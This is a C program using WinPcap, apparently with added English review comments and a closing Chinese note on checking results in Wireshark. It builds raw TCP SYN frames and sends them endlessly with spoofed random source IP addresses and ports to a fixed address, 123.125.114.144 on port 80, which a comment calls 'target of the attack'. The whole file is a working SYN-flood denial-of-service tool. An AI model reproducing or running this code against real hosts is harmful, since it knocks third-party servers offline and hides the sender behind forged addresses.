#define HAVE_REMOTE
#include<stdio.h>
#include<pcap.h>
#include<winsock2.h>
#include <time.h>
#include "remote-ext.h"
#pragma comment(lib,"wpcap.lib")
#pragma comment(lib,"WS2_32.lib")
#pragma pack(push,1)
/*
 * Byte-exact overlay for the start of the raw frame held in bufData.
 * Packing is forced to 1 so the fields map directly onto frame bytes with
 * no padding. The byte offsets given below assume a 2-byte short and a
 * 4-byte int.
 *
 * Fields are read and written in place on the frame buffer, so multi-byte
 * values must already be in network byte order when they are stored.
 */
typedef struct _TCP_SYN
{
unsigned char DstMAC[6]; // offset 0: destination MAC address
unsigned char SrcMAC[6]; // offset 6: source MAC address
unsigned char OtherData[12]; // offset 12: bytes between the MAC addresses and the checksum field; not touched by this file
unsigned short Header_ChechSum; // offset 24: header checksum (main recomputes it over the 20 bytes at frame offset 14)
unsigned int SrcIP; // offset 26: source IP address
unsigned int DstIP; // offset 30: destination IP address
unsigned short SrcPort; // offset 34: source port
unsigned short DstPort; // offset 36: destination port; usually port 80, i.e. the value 0x5000
unsigned char Ohters[16]; // offset 38: not touched by this file
unsigned short pak_checksum; // offset 54: not referenced anywhere else in this listing
unsigned char OtherLast[1]; // offset 56: last byte covered by the overlay; the frame itself is longer
}TCP_SYN, *PTCP_SYN;
#pragma pack(pop)
/*
 * Frame template: 66 bytes of frame data followed by the string literal's
 * implicit NUL, which is why the sender passes sizeof(bufData)-1.
 *
 * Layout as decoded from the bytes below:
 *   bytes  0-13  Ethernet header (destination MAC, source MAC, EtherType 0x0800)
 *   bytes 14-33  IPv4 header (version/IHL 0x45, total length 0x0034,
 *                TTL 0x80, protocol 0x06 = TCP)
 *   bytes 34-65  TCP header with options (data offset 8 = 32 bytes,
 *                flags 0x02 = SYN, window 0xffff)
 *
 * The buffer is mutable on purpose: main overlays a TCP_SYN struct on it
 * and rewrites some fields before each send. Every byte main does not
 * rewrite is identical in every frame that is sent.
 */
unsigned char bufData[]="\x00\x25\x86\x27\xd1\x22\x90\x2b\x34\x60\xbd\x44\x08\x00\x45\x00"
"\x00\x34\x61\xdc\x40\x00\x80\x06\x71\x83\xc0\xa8\x01\x6a\x7a\xe4"
"\xea\x6d\x0b\x0c\x00\x50\xb9\xc2\xf5\x06\x00\x00\x00\x00\x80\x02"
"\xff\xff\x8d\x8d\x00\x00\x02\x04\x05\xb4\x01\x03\x03\x01\x01\x01"
"\x04\x02";
/*
 * Compute a 16-bit one's-complement checksum over a byte range.
 *
 * buffer: start of the data, read as native 16-bit words.
 * size:   number of bytes to cover; a trailing odd byte is added as-is.
 *
 * Returns the bitwise complement of the folded 16-bit sum.
 */
unsigned short checksum(unsigned short *buffer, int size)
{
    unsigned long total = 0;
    const unsigned short *word = buffer;
    int remaining;

    /* Sum whole 16-bit words while at least two bytes are left. */
    for (remaining = size; remaining > 1; remaining -= 2) {
        total += *word++;
    }

    /* One byte left over: add it without padding or shifting. */
    if (remaining != 0) {
        total += *(const unsigned char *)word;
    }

    /* Fold the carries above bit 15 back into the low 16 bits, twice. */
    total = (total & 0xffff) + (total >> 16);
    total += total >> 16;

    return (unsigned short)~total;
}
/*
 * Entry point: picks a capture adapter, opens it, then transmits the
 * bufData frame in an endless loop with a few header fields rewritten on
 * every pass.
 *
 * What a capture of this traffic would show, per the loop below: a fixed
 * source MAC of 01:01:01:01:01:01, a fixed destination of 123.125.114.144
 * port 80, and every template field the loop does not touch repeated
 * unchanged in each frame. Only the source IP, the source port and the
 * header checksum at frame offset 24 differ between frames.
 *
 * argc/argv are not used. Returns -1 when the adapter cannot be opened or
 * a send fails; exits with status 1 when the device list cannot be read
 * or no adapter is selected.
 *
 * NOTE(review): srand/rand/exit and memcpy are used, but <stdlib.h> and
 * <string.h> are not in this file's visible include list - presumably
 * they arrive through another header; confirm.
 */
int main(int argc, char* argv[])
{
pcap_if_t *alldevs;
pcap_if_t *seldev;
pcap_t *fp;
char errbuf[PCAP_ERRBUF_SIZE];
// Seed rand() from the current time; rand() supplies the source IP and port below.
srand(time(0));
/* Get the list of local capture devices */
if (pcap_findalldevs(&alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}
// Treat the first adapter that has an IP address as the connected NIC
for (seldev = alldevs; seldev != NULL; seldev = seldev->next)
{
pcap_addr* pcapaddr = NULL;
for (pcapaddr= seldev->addresses; pcapaddr != NULL; pcapaddr = pcapaddr->next)
{
// NOTE(review): addr is dereferenced without a NULL check and sa_family is
// not inspected; sa_data[2] and sa_data[3] are presumably the first two
// IPv4 octets of an AF_INET entry - confirm.
if (pcapaddr->addr->sa_data[2] != '\0' && pcapaddr->addr->sa_data[3] != '\0')
{
break;
}
}
// pcapaddr is non-NULL only if the inner loop stopped on a matching address.
if (pcapaddr != NULL)
{
break;
}
}
if (seldev == NULL)
{
fprintf(stderr, "Can not find network!\n");
// NOTE(review): exits without pcap_freealldevs(alldevs).
exit(1);
}
/* Open the selected output device */
if ( (fp= pcap_open(seldev->name, // device name
100, // portion to capture (only the first 100 bytes are captured)
PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode
1000, // read timeout
NULL, // authentication on the remote machine
errbuf // error buffer
) ) == NULL)
{
// NOTE(review): the message prints alldevs->name (the first device in the
// list), but the device that failed to open is seldev->name. The device
// list is also not freed on this path.
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", alldevs->name);
return -1;
}
// Modify the source MAC and IP addresses, and update the header checksum
PTCP_SYN SynData = (PTCP_SYN)bufData;
// The loop has no break; the only way out is the return -1 on a send failure.
while(1)
{
memcpy(SynData->SrcMAC, "\x01\x01\x01\x01\x01\x01", 6); // source MAC address 01:01:01:01:01:01
SynData->DstIP = inet_addr("123.125.114.144"); // target of the attack
SynData->DstPort = htons(80); // destination port 80
// rand() result is stored as-is (host byte order); its range is bounded by RAND_MAX.
SynData->SrcIP = (unsigned int)rand(); // source IP address generated randomly
// The cast binds to rand() before the %, so the value is in 1024..1123;
// it is stored without htons(), i.e. in host byte order.
SynData->SrcPort = (unsigned short)rand()%100+1024; // source port generated randomly
// The checksum field must be zero while the checksum is being computed.
SynData->Header_ChechSum = 0;
SynData->Header_ChechSum = checksum((unsigned short*)&bufData[14], 20); // compute the checksum over the 20 bytes at frame offset 14
// printf("%d\n", SynData->Header_ChechSum);
/* Send the packet */
// (Wireshark shows packets with a checksum error in red text on a black background.)
// sizeof(bufData)-1 drops the string literal's trailing NUL from the frame.
if (pcap_sendpacket(fp, bufData, sizeof(bufData)-1 ) != 0)
{
// NOTE(review): the format string has no conversion for the
// pcap_geterr(fp) argument, so the error text is never printed.
// fp and alldevs are not released on this path.
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(fp));
return -1;
}
}
/* Free the device list */
// NOTE(review): unreachable - the loop above never falls through. fp is
// not closed anywhere in this function.
pcap_freealldevs(alldevs);
return 0;
}
验证方法:可以把源IP改成自己的地址,用Wireshark抓包,然后发送一个包,会看到对方回应了这个包(即可以收到[SYN,ACK]包)。如果一直在while循环里发送数据,Wireshark会忙于显示发送出去的包,很难看到接收到的包;所以验证时把while(1)注释掉,一个包一个包地发送,逐个确认情况。